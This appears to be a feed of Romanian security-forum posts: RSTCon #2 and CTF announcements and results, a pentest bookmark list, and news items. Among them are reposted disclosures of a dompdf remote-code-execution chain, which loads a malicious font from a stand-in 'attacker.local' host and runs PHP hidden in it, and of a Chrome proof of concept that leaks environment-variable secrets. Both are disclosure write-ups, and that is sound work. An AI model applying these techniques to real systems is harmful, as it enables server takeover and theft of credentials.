Nytro

1.Why Blockchain Security? 2.Blockchain Elements That Need Securing 3.What is a “Smart Contract”? 4.Understanding Smart Contracts and their Architecture 5.Smart Contract Platforms 6.Applications that integrate with blockchain 7.Smart Contract Code and vulnerabilities. 8.Demo: Live Exploit (Maybe).

Let me tell you a story about the time I’ve built a deadly ransomware virus in our secret hacking labs. Of course, the virus got lost into the wild and terrorized the world into a global ransomware epidemy, so that now every computer needs to stay at least 2 switches apart when communicating. Computers are now forced to wear a firewall each time a port is opened. Some say it’s all a conspiracy by Bill Gates to force us to install Windows Defender, others say the Internet will never be the same again…

Deschiderea conferintei ce va include detalii despre organizare, concursul CTF si desfasurarea evenimentului. De asemenea, veti afla mai multe despre comunitatea Romanian Security Team.

Prezentarile video sunt disponibile pe site: https://rstcon.com/prezentari/ Le puteti accesa direct de pe canalul de Youtube: https://www.youtube.com/channel/UCs-oJJm7A4VmwBtezIOn0JQ Si exista si un playlist RSTCon #2: https://www.youtube.com/watch?v=MTYdX2hGVXY&list=PLTaLvwriPW8zi3pkblN8yAqbZDZur992d

New Variant of Russian Cyclops Blink Botnet Targeting ASUS Routers March 17, 2022 Ravie Lakshmanan ASUS routers have emerged as the target of a nascent botnet called Cyclops Blink, almost a month after it was revealed the malware abused WatchGuard firewall appliances as a stepping stone to gain remote access to breached networks. According to a new report published by Trend Micro, the botnet's "main purpose is to build an infrastructure for further attacks on high-value targets," given that none of the infected hosts "belong to critical organizations, or those that have an evident value on economic, political, or military espionage." Intelligence agencies from the U.K. and the U.S. have characterized Cyclops Blink as a replacement framework for VPNFilter, another malware that has exploited network devices, primarily small office/home office (SOHO) routers, and network-attached storage (NAS) devices. Both VPNFilter and Cyclops Blink have been attributed to a Russian state-sponsored actor tracked as Sandworm (aka Voodoo Bear), which has also been linked to a number of high-profile intrusions, including that of the 2015 and 2016 attacks on the Ukrainian electrical grid, the 2017 NotPetya attack, and the 2018 Olympic Destroyer attack on the Winter Olympic Games. Written in the C language, the advanced modular botnet affects a number of ASUS router models, with the company acknowledging that it's working on an update to address any potential exploitation – GT-AC5300 firmware under 3.0.0.4.386.xxxx GT-AC2900 firmware under 3.0.0.4.386.xxxx RT-AC5300 firmware under 3.0.0.4.386.xxxx RT-AC88U firmware under 3.0.0.4.386.xxxx RT-AC3100 firmware under 3.0.0.4.386.xxxx RT-AC86U firmware under 3.0.0.4.386.xxxx RT-AC68U, AC68R, AC68W, AC68P firmware under 3.0.0.4.386.xxxx RT-AC66U_B1 firmware under 3.0.0.4.386.xxxx RT-AC3200 firmware under 3.0.0.4.386.xxxx RT-AC2900 firmware under 3.0.0.4.386.xxxx RT-AC1900P, RT-AC1900P firmware under 3.0.0.4.386.xxxx RT-AC87U (end-of-life) RT-AC66U (end-of-life), and RT-AC56U (end-of-life) Cyclops Blink, besides using OpenSSL to encrypt communications with its command-and-control (C2) servers, also incorporates specialized modules that can read and write from the devices' flash memory, granting it the ability to achieve persistence and survive factory resets. A second reconnaissance module serves as a channel for exfiltrating information from the hacked device back to the C2 server, while a file download component takes charge of retrieving arbitrary payloads optionally via HTTPS. The exact mode of initial access is currently not known, but Cyclops Blink is said to have impacted WatchGuard devices and Asus routers located in the U.S., India, Italy, Canada, and Russia since June 2019. Some of the affected hosts belong to a law firm in Europe, a medium-sized entity producing medical equipment for dentists in Southern Europe, and a plumbing company in the U.S. With IoT devices and routers becoming a lucrative attack surface due to the infrequency of patching and the absence of security software, Trend Micro warned that this could lead to the formation of "eternal botnets." "Once an IoT device is infected with malware, an attacker can have unrestricted internet access for downloading and deploying more stages of malware for reconnaissance, espionage, proxying, or anything else that the attacker wants to do," the researchers said. "In the case of Cyclops Blink, we have seen devices that were compromised for over 30 months (about two and a half years) in a row and were being set up as stable command-and-control servers for other bots." Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. Sursa: https://thehackernews.com/2022/03/new-variant-of-russian-cyclops-blink.html

From XSS to RCE (dompdf 0day) MARCH 16, 2022 BY MAXIMILIAN KIRCHMEIER, FABIAN BRÄUNLEIN The popular PHP library dompdf (used for rendering PDFs from HTML) suffers from a vulnerability that allows Remote Code Execution in certain configurations By injecting CSS into the data processed by dompdf, it can be tricked into storing a malicious font with a .php file extension in its font cache, which can later be executed by accessing it from the web We reported the vulnerability to dompdf on October 5th 2021. Since no patch is available yet, we are now publishing details about the vulnerability to inform the public about the risk and possible workarounds Introduction During a client engagement last year, we were faced with a website that seemed fairly impenetrable at first glance, due to its largely static nature: Target website (for the purposes of this article, we created a simple demo application that behaves similarly to the client’s website in the relevant aspects) While investigating the site, we did manage to find a reflected Cross-Site Scripting (XSS) issue: Seeing as the site did not store any sensitive information in clients’ browsers (such as authentication cookies), this in itself was a finding of low severity. At some point however, an interesting feature caught our eye. The site offered the option to export some of its pages in PDF form: Interesting feature: Exporting the website as a PDF, rendered on the server Promptly, the reflected XSS became a lot more interesting, because it let us control the input to the server-side PDF generator as well: Website with injected HTML in the title, rendered as PDF on the server Though it wasn’t possible to inject JavaScript that the PDF renderer would interpret, we were able to inject arbitrary HTML (as shown above with the ‘In PDF’ title in italics). Running pdfinfo on the exported PDF told us which library was responsible for the PDF rendering on the server: Output of pdfinfo showing the PDF renderer used in the back-end We thus knew which HTML-to-PDF converter was used in the back-end (dompdf), and at which version. (Note that the version actually in use on the client’s server was v0.8.5, but since the exploit path we will show here still works the same on the newest version v1.2.0, we will be using this version for the purpose of the article. At the time of disclosure, there are no known vulnerabilities for either version 0.8.5 or 1.2.0.) Looking for a vulnerability At this point, we shifted our attention to dompdf’s source code, to see if we might be able to find a vulnerability that could get us further access to the server. The first thing that caught our eye was the option to execute embedded PHP during PDF rendering, which, if enabled, would have made our job quite easy: /** * Enable embedded PHP * * If this setting is set to true then DOMPDF will automatically evaluate * embedded PHP contained within ... tags. * * ==== IMPORTANT ==== * Enabling this for documents you do not trust (e.g. arbitrary remote html * pages) is a security risk. Embedded scripts are run with the same level of * system access available to dompdf. Set this option to false (recommended) * if you wish to process untrusted documents. * * This setting may increase the risk of system exploit. Do not change * this settings without understanding the consequences. Additional * documentation is available on the dompdf wiki at: * * * @var bool */ private $isPhpEnabled = false; However, this feature turned out to be disabled. (Note: If you are running dompdf on your server, you probably want to ensure this feature is turned off. The official guide for ‘Securing dompdf’ concurs.) The next interesting setting concerned the loading of remote resources: /** * Enable remote file access * * If this setting is set to true, DOMPDF will access remote sites for * images and CSS files as required. * * ==== IMPORTANT ==== * This can be a security risk, in particular in combination with isPhpEnabled and * allowing remote html code to be passed to $dompdf = new DOMPDF(); $dompdf->load_html(...); * This allows anonymous users to download legally doubtful internet content which on * tracing back appears to being downloaded by your server, or allows malicious php code * in remote html pages to be executed by your server with your account privileges. * * This setting may increase the risk of system exploit. Do not change * this settings without understanding the consequences. Additional * documentation is available on the dompdf wiki at: * * * @var bool */ private $isRemoteEnabled = false; To check for the state of this setting, we used the XSS to include an external stylesheet (shrinking the image and setting its background to light grey for testing purposes): We could thus confirm that the setting was enabled, and could proceed with figuring out what this allowed us to do. First possibility: The font cache index When $isRemoteEnabled is set (or on versions ≤ 0.8.5, regardless of this setting), dompdf allows loading custom fonts through font-face CSS rules such as the following: @font-face { font-family:'TestFont'; src:url('http://attacker.local/test_font.ttf'); font-weight:'normal'; font-style:'normal'; } When an external font is used, dompdf caches it locally in the /lib/fonts sub-directory, and adds a corresponding entry in dompdf_font_family_cache.php using saveFontFamilies(). This function encodes the fonts known to dompdf as a PHP array, together with the information needed to look them up later. From a log file we found elsewhere on the system, we already suspected that dompdf was stored in a directory accessible from the web-root, and indeed the lack of an error message when attempting to access the font cache index seemed to indicate the same: Attempting to access the font cache index directly: Blank page instead of an error message Since this means a PHP file we can access externally is generated based on input controlled by us, it seemed a worthwhile avenue to explore for potential vulnerabilities. However, the only parameter we had direct influence over (the $family) was escaped sufficiently using addslashes() to make exploitation impossible. We therefore had to keep looking further - though not very far. Next step: The font cache If we can’t use the font cache index… can we use the font cache directly? Let’s see how dompdf registers new fonts (shown here in condensed form for the sake of clarity): /** * @param array $style * @param string $remoteFile * @param resource $context * @return bool */ public function registerFont($style, $remoteFile, $context = null) { $fontname = mb_strtolower($style["family"]); $styleString = $this->getType("{$style['weight']} {$style['style']}"); $fontDir = $this->options->getFontDir(); $remoteHash = md5($remoteFile); $prefix = $fontname . "_" . $styleString; $prefix = preg_replace("[\\W]", "_", $prefix); $prefix = preg_replace("/[^-_\\w]+/", "", $prefix); $localFile = $fontDir . "/" . $prefix . "_" . $remoteHash; $localFile .= ".".strtolower(pathinfo(parse_url($remoteFile, PHP_URL_PATH), PATHINFO_EXTENSION)); // Download the remote file list($remoteFileContent, $http_response_header) = @Helpers::getFileContent($remoteFile, $context); $localTempFile = @tempnam($this->options->get("tempDir"), "dompdf-font-"); file_put_contents($localTempFile, $remoteFileContent); $font = Font::load($localTempFile); if (!$font) { unlink($localTempFile); return false; } $font->parse(); $font->close(); unlink($localTempFile); // Save the changes file_put_contents($localFile, $remoteFileContent); $this->saveFontFamilies(); return true; } There’s a few things this code snippet tells us: The filename of a newly cached font is deterministic and based on information we have, namely the font’s name, the chosen style and a hash of its remote URL (line 9-19). The test-font from above with URL http://attacker.local/test_font.ttf and weight/style “normal” would e.g. get stored as testfont_normal_d249c21fbbb1302ab53282354d462d9e.ttf Though care is taken to prevent the possibility of a path traversal vulnerability (by removing potentially dangerous characters in line 16 and 17), the font’s original file extension is kept The font needs to be valid in the sense that it has to survive loading and parsing by php-font-lib (lines 28 and 35) When inspecting php-font-lib’s source code, it quickly became apparent that this library only checks a font’s internal consistency, based on its file headers, and completely ignores its file extension. So what happens if we take a valid .ttf font, add a <?php phpinfo(); ?> in its Copyright section, store it as 'exploit_font.php' and include it via an injected CSS file? Well… phpinfo() is executed on the victim server when accessing the malicious font file (Side note: The redacted information was replaced by random noise before blurring) We have published the demo application and exploit at github.com/positive-security/dompdf-rce. Analysis Security vulnerabilities often occur due to (design) decisions made based on incorrect assumptions about underlying or interconnected components. For the concrete scenario we encountered, we could identify three decisions/assumptions that contributed significantly to the RCE vulnerability on the client’s server: “It should be okay to trust php-font-lib with checking fonts, since it will only accept fonts that are valid (and have the appropriate file extension)”: This assumption, made by the dompdf developers, turned out to be incorrect because php-font-lib’s concept of a valid font only required consistency between the font’s headers and its internal structure, irrespective of its file extension “It should be okay to have dompdf’s setting $isRemoteEnabled set to true, since the website itself is essentially static and we therefore control the input to the PDF renderer”: This assumption, made by our client, was broken by the reflected XSS vulnerability “It should be okay to have dompdf in an externally accessible sub-directory”: This action, though probably not performed consciously by our client but rather out of convenience, sadly turned out to be misguided Though all three factors were necessary for the full exploit, they differ in respect to ‘preventability’. The first decision, which led to the font vulnerability, was a mistake that (albeit unfortunate) can readily occur in any complex software project and is essentially impossible to avoid completely. The second decision increased the attack surface for our client, but was necessary to implement the intended functionality. The third factor could be seen more critically however, since it directly contradicted the top-most point outlined in the guide for ‘Securing dompdf’, which has existed in this form since 2016. From a post-mortem perspective, it would therefore make sense to examine the workflow that resulted in this step being taken, as including an external library without properly assessing its security impact would have been the most easily preventable factor. Impact There are a number of use cases that require server-side generation of PDFs containing user-supplied input, such as ticket purchases, receipts/invoices or other automated emails from service providers, or even Corona test certificates. It is possible that some of these services are also affected, if the following preconditions are met: dompdf is installed in a directory accessible through the web. This could for example easily happen if Composer was used to install the library somewhere inside the docroot without explicitly forbidding access to the vendor folder PDFs are being generated using insufficiently sanitized user input. This could be caused through e.g. an XSS, as demonstrated here, or by directly passing user data to the back-end (such as the user’s name or address) dompdf version ≤ 0.8.5 is being used, or $isRemoteEnabled is set to true. Note that versions ≤ 0.8.5 do not require $isRemoteEnabled to be set to be vulnerable, as they load certain remote elements (such as fonts) even with the setting deactivated While we don't have installation numbers, GitHub metrics suggest dompdf to be the most popular option for generating PDFs from PHP: Library Stars Forks Dependent Repos dompdf 8.6k 1.6k 59.2k snappy 4k 421 - mpdf 3.5k 886 16.6k tcpdf 3.2k 1.3k 14.5k tc-lib-pdf 1.2k 180 85 Mitigation Though there isn’t a patch for dompdf available yet, there are steps you can take to minimize your risk of being exposed to this vulnerability. Make sure dompdf is not installed in a web-accessible directory. This is the most important point, as it would completely prevent the exploit Double-check the input sanitization you perform before passing data to dompdf, to prevent attackers from injecting HTML/CSS. This is a good idea in any case, as there might be other vulnerabilities that can be triggered in similar ways Update dompdf to a recent version and turn off $isRemoteEnabled, if possible for your use case. Though the most recent version available at time of publishing this article (1.2.0) is still susceptible to the vulnerability, it does consult the $isRemoteEnabled setting before attempting to download fonts from remote locations (unlike versions ≤ 0.8.5, which simply ignore the setting in that context) And finally, keep an eye out for a dompdf patch that fixes this vulnerability and apply it once it is available. You could for example stay up-to-date by subscribing to dompdf’s release feed with an Atom reader of your choice Timeline 2021-10-05 Vulnerability reported to security@dompdf.org (from SECURITY.md) 2021-10-08 Followed up on report 2021-10-12 Created a GitHub issue to draw attention to report 2021-10-13 Report acknowledged, issue tagged for “v2.0.0” 2021-11-16 Version 1.1.0 released, without fix 2021-11-24 Version 1.1.1 released, without fix 2022-01-03 90 days since initial report 2022-02-07 Version 1.2.0 released, without fix 2022-02-07 Asked developers for patching horizon and notified them of upcoming disclosure 2022-02-16 Follow-up email 2022-03-10 Follow-up email 2022-03-15 Received response from dompdf that they "can not provide a time frame for said [v2.0] update at this moment" 2022-03-16 Public disclosure Conclusion While investigating a client website, we discovered a vulnerability in the PDF rendering PHP library dompdf that allowed us to upload font files with a .php extension to the web server. To trigger it, we used an XSS vulnerability that allowed us to inject HTML into a web page before it was rendered as a PDF. Since dompdf was installed in a web-accessible directory (and we knew its location thanks to a leaked logfile), we could navigate to the uploaded .php script, giving us code execution on the server. Versions ≤ 1.2.0 of dompdf that are located in a web-accessible directory and have $isRemoteEnabled activated should be considered vulnerable, as should be versions ≤ 0.8.5 even with $isRemoteEnabled set to false. The exploit files and source code for the demo application are available on GitHub. ‍ Follow us on Twitter (@positive_sec) to keep up to date with our posts. Sursa: https://positive.security/blog/dompdf-rce

Penetration Testing OffSec Penetration Testing with Kali - Online Security Training Offensive Security Student Support Offensive Security Forums Exploits Database by Offensive Security Windows Privilege Escalation Checklists/Windows-Privilege-Escalation.md at master · netbiosX/Checklists Windows Privilege Escalation - a cheatsheet | Tim Arneaud OSCP - Windows Priviledge Escalation | Hacking and security FuzzySecurity | Windows Privilege Escalation Fundamentals Privilege Escalation | To Shell And Back: Adventures In Pentesting Cheat Sheets Spawning a TTY Shell MSFVennom cheat sheet Msfvenom Cheat Sheet – Security-Geek Path Traversal Cheat Sheet: Linux — GracefulSecurity Path Traversal Cheat Sheet: Windows — GracefulSecurity Reverse Shell Cheat Sheet | pentestmonkey How to Bypassing Filter to Traversal Attacks ? | Hacking & Tricks Local Linux Enumeration & Privilege Escalation Cheatsheet – Rebootuser Escape From SHELLcatraz - Breaking Out of Restricted Unix Shells - Speaker Deck Common Web-services · Security - My notepad Nmap Cheat Sheet Luke’s Ultimate OSCP Guide: Part 3 — Practical hacking tips and tricks Penetration Testing Methodology - 0DAYsecurity.com OSCP-Survival-Guide.pdf SQLinjection Login Bypass Using SQL Injection Hacking website using SQL Injection -step by step guide – Ethical Hacking Tutorials | Learn How to Hack | Hacking Tricks | Penetration Testing Lab Vulnhub – Kioptrix: Level 1.2 (#3) – Guillermo Cura Enumeration Visualized Wiki Guides OSCP · Teck_k2 Offensive Security's Complete Guide to Alpha how-to-oscp-final.md Loot and Enumerate · Security - My notepad Offensive Security's PWB and OSCP - My Experience - Security SiftSecurity Sift Jack Hacks Interesting Local File Inclusion method | DiabloHorn ferreirasc/oscp: oscp study Offensive Security Certified Professional (OSCP) Review - Jim Wilbur's Blog Passing OSCP - scund00r BlackWinter Security | Code and Stuff Linux Privilege Escalation Linux Privilege Escalation by Exploiting Cronjobs Basic Linux Privilege Escalation Pentest Practice Links Penetration test lab "Test lab" | Pentestit CTF365 - Capture The Flag | Security Training Platform [PentesterLab] PentesterLab Pro Mainsequence - Exploit Exercises OverTheWire: Natas Level 0 Welcome [Root Me : Hacking and Information Security learning platform] Hack The Box :: Penetration Testing Labs Hack The Box :: Forums Vulnerable By Design ~ VulnHub PentesterAcademy Pentester Academy: Learn Pentesting Online AttackDefense Labs: Pentester Academy Bug Bounty HackerOne Hacker101 CTF Hacker101 | HackerOne Platform Documentation Synack Synack - Dashboard Synack Onboarding Learn to hack and collaborate with other security researchers on bug bounties | BugBountyNotes.com GitHub - jhaddix/tbhm: The Bug Hunters Methodology Tomnomnom Vim Tutorial - Knowledge Base Assetnote Wordlists Penetration Testing with Kali - Online Security Training Offensive Security Student Support Offensive Security - Purchase Page Offensive Security - Exam Scheduling Link Exploits Database by Offensive Security Offensive Security Forums Hack The Box :: Penetration Testing Labs Hack The Box :: Forums IppSec - YouTube Vulnerable By Design ~ VulnHub codingo/Reconnoitre: A security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing. Scripts/Enumeration.py at master · MistSpark/Scripts · GitHub Pentesting Links Penetration test lab "Test lab" | Pentestit CTF365 - Capture The Flag | Security Training Platform [PentesterLab] PentesterLab Pro Mainsequence - Exploit Exercises OverTheWire: Natas Level 0 Welcome [Root Me : Hacking and Information Security learning platform] Pentester Academy: Learn Pentesting Online AttackDefense Labs: Pentester Academy Attify Store - Offensive IoT Exploitation | Attify Store Flex Center // Infosec Skills :: Home Reverse Engineering GREM IT and Information Security Cheat Sheets GIAC GREM Certification | Reverse Engineering Malware Cheat Sheet for Analyzing Malicious Software Reading The_Evolution_of_TDL.pdf Detecting DNS Tunneling Two's Complement VirusTotal Learn to Develop with Microsoft Developer Network | MSDN GitHub - ytisf/theZoo: A repository of LIVE malwares for your own joy and pleasure. theZoo is a project created to make the possibility of malware analysis open and available to the public. MalwareTech - Life of a Malware Analyst The “Ultimate”Anti-Debugging Reference DEF CON CHINA Reverse Engineering challenges ARM Writing ARM Assembly (Part 1) | Azeria Labs Hardware FCC OET Authorization Search IoT Firmware Exploitation Online Practical Reverse Engineering Part 1 - Hunting for Debug Ports · Hack The World Intro to Hardware Hacking - Dumping your First Firmware IoT Hacking Tools | Attify Store Electronics – /dev/ttyS0 Extracting Flash Memory over SPI | GracefulSecurity NAND Flash Data Recovery Cookbook Centrifuge Platform® | Firmware Security Analysis | ReFirm Labs Binwalk Pro Network Protocols Reverse Engineering Network Protocols - Jack Hacks hasherezade (hasherezade) Hasherezade's projects SDR Hacking Signal Identification Wiki The Cryptopals Crypto Challenges ExploitDev Corelan ..:: Corelan Team | Peter Van Eeckhoutte (corelanc0d3r) ::.. Exploit writing tutorial part 1 : Stack Based Overflows | Corelan Team Exploit writing tutorial part 2 : Stack Based Overflows – jumping to shellcode | Corelan Team Exploit writing tutorial part 3 : SEH Based Exploits | Corelan Team Exploit writing tutorial part 3b : SEH Based Exploits – just another example | Corelan Team Exploit writing tutorial part 4 : From Exploit to Metasploit – The basics | Corelan Team Exploit writing tutorial part 5 : How debugger modules & plugins can speed up basic exploit development | Corelan Team Exploit writing tutorial part 6 : Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR | Corelan Team Exploit writing tutorial part 7 : Unicode – from 0x00410041 to calc | Corelan Team Exploit writing tutorial part 8 : Win32 Egg Hunting | Corelan Team Exploit writing tutorial part 9 : Introduction to Win32 shellcoding | Corelan Team Reverse Engineering and Binary Exploitation Series | PWNTHEBOX! FuzzySecurity | Tutorials ARM Products GitHub - Billy-Ellis/Exploit-Challenges: A collection of vulnerable ARM binaries for practicing exploit development Writing ARM Assembly (Part 1) | Azeria Labs Search [Root Me : Hacking and Information Security learning platform] Corellium arm_exploitation/exploitation_on_arm_based_systems.pdf at master · sashs/arm_exploitation 15/85 Security ROP on ARM with radare2 Microsoft Word - ARM paperF.docx OSCE Offensive Security’s CTP & OSCE Review - Jack Hacks OSCE/CTP Prep Guide – Tulpa Security mona.py – the manual | Corelan Team Resources for OSCE CTP/OSCE Prep – Wrapping Up Our Prep - The Human Machine Interface h0mbre/CTP-OSCE: Scripts I used during CTP jtpereyda/boofuzz: A fork and successor of the Sulley Fuzzing Framework Study Guide & Tips: Offensive Security Certified Expert (OSCE) / Cracking The Perimeter (CTP) - Amin Bohio phra's blog ~ Technical posts about InfoSec abatchy's blog | OSCE Study Plan Upgrade from LFI to RCE via PHP Sessions - RCE Security Taking_Back_Netcat.pdf OSCE Review (CTP Course) - Everything S3curity The Human Machine Interface h0mbre/Learning-C: A series of mini-projects used to learn C for beginners metasploit-payloads/c/meterpreter/workspace at master · rapid7/metasploit-payloads Linux Exploitation xairy/linux-kernel-exploitation: A collection of links related to Linux kernel exploitation OSEE awe_syllabus_2018 OSEE - AWEstralia 2018 preparations | www.jollyfrogs.com timip/OSEE: OSEE Preparation Common WinDbg Commands (Thematically Grouped) Windows Kernel Exploitation Tutorial Part 1: Setting up the Environment - rootkit abatchy's blog | Tutorials IoT Hardware IoT Firmware Exploitation Online | Registration The best resources for learning exploit development – Fabio Baroni Backdooring PE Files with Shellcode - Red Teaming Experiments Windows Exploitation Ricerca Security: "I'll ask your body": SMBGhost… SMBleedingGhost Writeup: Chaining SMBleed (CVE-20… Windows Internals & Software Drivers – OSR What is this? - Red Teaming Experiments Qemu Installing Qemu for Windows [E-Maculation wiki] Qemu package and guide for Windows available • E-Maculation Forum Index of /lubuntu/releases/16.04/release Building PPC Linux code using QEMU on Ubuntu 18.04 LTS Debian Ports Qemu - Google Drive hugsy/cemu: Cheap EMUlator: lightweight multi-architecture assembly playground Microcontrollers and SDRs Nyan Sat - Satellite Communications Challenge - Chapter 0 GNURadio GNU Radio Tutorials - GNU Radio Embedded Programming FastBit Embedded Brain Academy | Works on Firmware and Embedded Engineering | Udemy WebSecAcademy Web Security Academy: Free Online Training from PortSwigger Sursa: https://x0rb3l.github.io/Cyber-Bookmarks/bookmarks.html

CVE-2022-0337 System environment variables leak on Google Chrome, Microsoft Edge and Opera 📝 Description Successful exploitation of this vulnerability can lead to the leak of user's secrets stored inside a system environment variables. A security bug was found in Chromium 92 version and patched in 97 version. There are several web browsers based on the chromium engine, for instance, Google Chrome, Microsoft Edge, Opera, and Brave. All of them were vulnerable, except for Brave. The vulnerability is in the File system access API, more specifically in window.showSaveFilePicker() method. CVE Version: CVE-2022-0337 Credits: Maciej Pulikowski Reward: $10,000 from Google VRP Web browser versions vulnerability: 92-96 Vulnerable ❗️❗️ 97+ Patched (safe) ✔ 92-96 Vulnerable ❗️❗️ 97+ Patched (safe) ✔ 78-82 Vulnerable ❗️❗️ 82 Patched (safe) ✔ Safe ✔ Safe ✔ Check your web-browser version: Google Chrome: chrome://version/ Microsoft Edge: edge://version/ Opera: opera://update Operation Systems: ONLY WINDOWS are vulnerable. Linux and Mac are safe. 📺 Youtube Proof of Concept https://www.youtube.com/watch?v=q7OIEWtalg8 Thanks for the thumbs up and subscriptions 😀👍 👨‍💻 Code Proof of concept The simplest one Write in your Devtools: let a = await window.showSaveFilePicker({suggestedName:'%username%'}); a.name; Save file Your username should appear In the example, it is used a %username% environment variable. It returns Windows username logged in. Moreover, there are much more interesting environment variables: Here are some examples: AWS_SECRET_ACCESS_KEY AZURE_CLIENT_SECRET binance_secret GITHUB_TOKEN GOOGLE_API_KEY and many more... So the attacker could gain an access to targets AWS services, Github account or Binance token to API (withdraw money) and more... Check out more secrets in environment variables on my repository: 🦄🔒 Awesome list of secrets in environment variables 🖥️ Crafted HTML with improvlments The previous example is run in local Google Chrome Devtools. Obviously, the attacker could craft a special HTML file (website) to do successful exploitation of this vulnerability. env.html - is an example of crafted special HTML in the repository. But, do really user is required to download a file? Yes, however, the attacker can create a website to encourage User to hold ENTER button on keyboard for 2 seconds to run and accept saving file dialog. Because windows dialog by default focus Save button, file will be saved with only blink. *.gif is from Opera (Chrome and Edge were already fixed) In conclusion, user after holding the ENTER button on keyboard for 2 seconds could lead to leak of his system environments variables. This is a significant problem because user could store important secrets in system environments variable ex. Access to his AWS services, Github account or Binance 🧠 Things to remember from the write-up: Environments variables can store secrets ex. tokens, api-key, secrets if payload "%USERNAME%" or "$:USERNAME" or "${USERNAME}" or "$USER" return real username then target is vulnerable 🔨 Fix in chromium I gave myself challange to repair the bug. Here, I would like to underline that I am not a c++ dev 😎. source: https://bugs.chromium.org/p/chromium/issues/detail?id=1247389#c9 One of solution was to just replace character % in suggestedName to _ . It should solve the problem. My solution: could be insert in: https://source.chromium.org/chromium/chromium/src/+/main:content/browser/file_system_access/file_system_chooser.cc;l=238?q=ResolveSuggestedNameExtension&ss=chromium%2Fchromium%2Fsrc and the results are: Before fix: After my fix: Indeed it solved the problem, but it wasn't the best place to insert the code 😋 . However, I was very happy to manage to repair it by myself 😎 Final fix can be found here: https://bugs.chromium.org/p/chromium/issues/detail?id=1247389#c12 🌌 Timeline [07.09.2021, 10:40 PM GMT+2] Bug reported by Maciej Pulikowski [07.09.2021, 11:36 PM GMT+2] Bug accepted (Pri:1, Severity-High) [08.11.2021, 1:30 AM GMT+1] My submit for possible fix in code for chromium source [10.12.2021, 6:09 PM GMT+1] Fixed [7.01.2022, 2:09 AM GMT+1] Reward of $10,000 [18.03.2022, 6:30 PM GMT+1] Google removed security view restrictions 💻 Useful links Issue 1247389: Security: Possible to see the user's system environment variables like secrets, tokens or keys 🦄🔒 Awesome list of secrets in environment variables 🖥️ The File System Access API: simplifying access to local files File System Access - Documentation File System Access Web API - Chromium Security Model 🤝 Show your support 🤝 Show your support - give a ⭐️ if you liked the content | SHARE on Twitter | Follow me on ✔️ Disclaimer This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author. Sursa: https://github.com/Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera

Multumim tuturor care au participat la concursul CTF! De asemenea multumim tuturor celor care au creat exercitii! Clasamentul final poate fi vazut aici: https://ctf.rstcon.com/scoreboard - Locul I - adragos (3000 RON) - Locul II - Kayn (2000 RON) - Locul III - edmund (1000 RON) Castigatorii au fost contactati pentru oferirea premiilor. Exercitiile CTF vor mai ramane online o perioada (1-2 saptamani): https://ctf.rstcon.com/ Mentionez ca exercitiul Windows PWN nu a fost rezolvat, prima persoana care o va rezolva va primi un premiu bonus de 1000 RON. Statistici: - 78 de persoane inregistrate - 32 au rezolvat cel putin un exercitiu - 25 au rezolvat probabil cel mai usor exercitiu (Steago) Asteptam parerile voastre referitoare la CTF dar si la exercitii. De asemenea sper ca la anul sa avem mai multi participanti si mai multe exercitii.

RSTCon #2 si CTF s-a terminat. Multumim tuturor participantilor! Astept aici sau pe PM pareri, sugestii sau orice fel de feedback. Prezentarile video si slide-urile vor fi publicate pe https://rstcon.com in curand.

A doua si ultima zi a conferintei si CTF-ului RSTCon #2 incepe in 15 minute. Mai multe informatii: https://rstcon.com/

RSTCon, conferinta de securitate IT online, gratuita si in limba romana si concursul CTF incep in 10 minute. https://rstcon.com/

Dimineata la 10 incepe!

Biroul Federal pentru Securitatea Informaţiei din Germania a recomandat marţi evitarea utilizării de software anti-virus dezvoltat de firma rusă Kaspersky, avertizând că această firmă ar putea fi implicată, de bună voie sau forţat, în eventuale atacuri cibernetice, informează AFP. De la invadarea Ucrainei, acţiunile forţelor armate şi/sau a serviciilor de informaţii din Rusia "sunt asociate cu un risc considerabil de atac informatic", a explicat Biroul Federal pentru Securitatea Informaţiei (BSI) într-un comunicat de presă. "Un producător rus de software ar putea efectua operaţiuni ofensive, să fie constrâns, împotriva voinţei sale, să atace sisteme sau să fie el însuşi victima unui atac cibernetic, spionat sau utilizat ca un instrument pentru a lansa atacuri împotriva propriilor săi clienţi", a apreciat BSI. În replică, Kaspersky, unul din cei mai mari dezvoltatori mondiali de software, a respins acuzaţiile de colaborare cu Kremlinul. Kaspersky precizează că este o companie privată fără legături cu Guvernul rus iar avertismentul lansat de BSI este unul motivat politic. Kaspersky este o companie globală de securitate cibernetică fondată în anul 1997, ce oferă soluţii de securitate şi servicii inovatoare pentru a proteja companiile, infrastructura critică, autorităţile guvernamentale şi utilizatorii individuali. Portofoliul companiei cuprinde peste 400 de milioane de utilizatori individuali, precum şi 250.000 de companii-client. AGERPRES/(AS - autor: Constantin Balaban, editor: Andreea Marinescu, editor online: Andreea Lăzăroiu) Sursa: https://www.agerpres.ro/economic-extern/2022/03/15/germania-avertizeaza-utilizatorii-de-software-anti-virus-kaspersky-ca-ar-putea-fi-vizati-de-un-atac-cibernetic--884938?

Da, o sa fie inregistrate si postate pe canalul de Youtube (si aici si pe site).

Mai poate cineva ajuta cu exercitii pentru CTF? Haideti, mai ales cei care participati! Am auzit des mesaje de genul "nu e realist" sau alte lucruri, chiar sunt curios ce fel de exercitii ar face persoanele care participa activ la CTF-uri.

RST Con si CTF #2 va avea loc joi si vineri 17-18 martie 2022 de la 10:00 la 17:00. Detalii: https://rstcon.com/

Salut! Nu stiu exact, maxim online au fost 100+. Vreo 40 cred ca au participat la CTF.

Salut, o sa prezint la RSTCon #2 ceva pe subiect. Introduction to Penetration Testing ar fi un inceput OK. Oricum mai intai trebuie sa intelegi teoria si cum functioneaza lucrurile ca apoi sa faci practic.

Daca exista persoane care pot ajuta cu exercitii CTF sa dea un semn, am luat cateva VPS-uri pentru ele.

Link nou pentru Slack, aparent expira: https://join.slack.com/t/romaniansecurityteam/shared_invite/zt-151mrhbj8-gwfCsR~H4GvWh0LVYNNkLw

Lista prezentarilor pentru RST Con #2 este publica. Prezentari: https://rstcon.com/prezentari/ Speakeri: https://rstcon.com/speakeri/

Ar trebui sa il raportezi, chiar daca nu au bug bounty. Poate cand au drum prin zona iti aduc ceva.

Dap, un privesc care pare foarte "fiabil".

